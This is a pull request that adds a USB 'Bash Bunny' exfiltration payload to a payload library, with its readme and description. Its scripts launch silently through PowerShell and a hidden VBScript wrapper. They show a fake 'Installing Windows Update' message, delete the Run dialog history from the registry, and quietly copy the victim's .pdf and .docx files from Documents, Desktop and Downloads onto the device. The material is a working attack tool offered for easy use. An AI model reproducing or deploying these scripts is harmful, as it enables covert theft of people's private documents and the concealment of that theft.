### PR TITLE
Addition of Exfiltration payload

### DIFF
--- a/payloads/library/exfiltration/simple-usb-extractor/e.cmd
+++ b/payloads/library/exfiltration/simple-usb-extractor/e.cmd
@@ -1,1 +1,0 @@
-mkdir %USERPROFILE%\Desktop\testfolder

--- a/payloads/library/exfiltration/simple-usb-extractor/e.cmd
+++ b/payloads/library/exfiltration/simple-usb-extractor/e.cmd
@@ -1,0 +1,1 @@
+mkdir %USERPROFILE%\Desktop\testfolder

--- a/payloads/library/exfiltration/simple-usb-extractor/i.vbs
+++ b/payloads/library/exfiltration/simple-usb-extractor/i.vbs
@@ -1,0 +1,1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

--- a/payloads/library/exfiltration/simple-usb-extractor/payload.txt
+++ b/payloads/library/exfiltration/simple-usb-extractor/payload.txt
@@ -1,0 +1,6 @@
+# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
+GET SWITCH_POSITION
+LED ATTACK
+ATTACKMODE HID STORAGE
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\z.cmd')"
+LED FINISH

--- a/payloads/library/exfiltration/simple-usb-extractor/readme.md
+++ b/payloads/library/exfiltration/simple-usb-extractor/readme.md
@@ -18,7 +18,7 @@ None :)
 
 ### Configuration (optional)
 ---
-By default the payload is set to pull all .pdf and .docx files from the Desktop and Documents folders. You can add new items/locations by making new xcopy lines in the x.cmd file.
+By default the payload is set to pull all .pdf and .docx files from the Desktop, Downloads, and Documents folders. You can add new items/locations by making new xcopy lines in the x.cmd file.
 
 
 ### Status:

--- a/payloads/library/exfiltration/simple-usb-extractor/readme.md
+++ b/payloads/library/exfiltration/simple-usb-extractor/readme.md
@@ -1,0 +1,33 @@
+# Simple USB File Extractor
+---
+- Author: DanTheGoodman
+- Creds: thehappydinoa, sebkinne
+(I snagged lots of lines from their code)
+
+### Description
+---
+A stupid easy to use file extractor leveraging the USB storage attack mode. Will stuff the found files in the `/loot/simple-usb-file-extractor` folder. Also deletes the run-line history because why not.
+
+
+
+### Dependencies
+---
+None :)
+
+
+
+### Configuration (optional)
+---
+By default the payload is set to pull all .pdf and .docx files from the Desktop and Documents folders. You can add new items/locations by making new xcopy lines in the x.cmd file.
+
+
+### Status:
+---
+|LED|Status|
+|---|---|
+|Yellow single blink|Running payload|
+|Blue Single blink|Copying any files to Bash Bunny|
+|Solid Green|Files copied|
+
+---
+This is my first payload for the Bash Bunny, and I have finals right now, and I am doing this instead of studying so it's not fancy but I wanted to make something.

--- a/payloads/library/exfiltration/simple-usb-extractor/readme.md
+++ b/payloads/library/exfiltration/simple-usb-extractor/readme.md
@@ -26,7 +26,6 @@ By default the payload is set to pull all .pdf and .docx files from the Desktop,
 |LED|Status|
 |---|---|
 |Yellow single blink|Running payload|
-|Blue Single blink|Copying any files to Bash Bunny|
 |Solid Green|Files copied|
 
 ---

--- a/payloads/library/exfiltration/simple-usb-extractor/x.cmd
+++ b/payloads/library/exfiltration/simple-usb-extractor/x.cmd
@@ -1,0 +1,37 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Set the location
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+if Exist %USERPROFILE%\Documents (
+REM /C Continues copying even if errors occur.
+REM /Q Does not display file names while copying.
+REM /G Allows the copying of encrypted files to destination that does not support encryption.
+REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
+REM /E Copies directories and subdirectories, including empty ones.
+
+REM Add more of the line below specifying the location and file type
+REM The below example grabs all .pdf files from the user's documents folder
+REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
+
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.docx %dst% >>nul
+)
+
+if Exist %USERPROFILE%\Desktop (
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.docx %dst% >>nul
+)
+
+if Exist %USERPROFILE%\Downloads (
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
+)
+
+@cls
+@exit

--- a/payloads/library/exfiltration/simple-usb-extractor/z.cmd
+++ b/payloads/library/exfiltration/simple-usb-extractor/z.cmd
@@ -1,0 +1,3 @@
+@echo off
+cscript %~dp0\i.vbs %~dp0\x.cmd
+@exit


### PR DESCRIPTION
Creation of the simple-usb-exfiltration payload

This improves upon usb_exfiltration payload in a handful of ways:

1. It is fairly easier to understand for those who aren't scripting wizards.
2. It doesn't grab a billion nested folders when things are installed.
3. It shows how to add different locations and file types explicitly, with the addition of creating if statements for their folder's existence.
4. By default it looks for more file types in more locations, making it better for just dropping onto a bunny and using it.
5. Readme is much more descriptive (LED colors, how to config,.
6. Doesn't fail when the user does not have laZagne.exe on their bunny (there is no download link in the readme), and doesn't indicate it as a dependency in the readme for even partial operation (which is pretty much why I made this in the first place).

TL;DR: It has no dependencies and is more descriptive in its LED indication and configuration, etc.